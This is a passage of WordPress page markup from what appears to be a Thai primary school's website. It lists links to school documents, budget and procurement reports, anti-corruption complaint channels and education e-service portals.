href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" 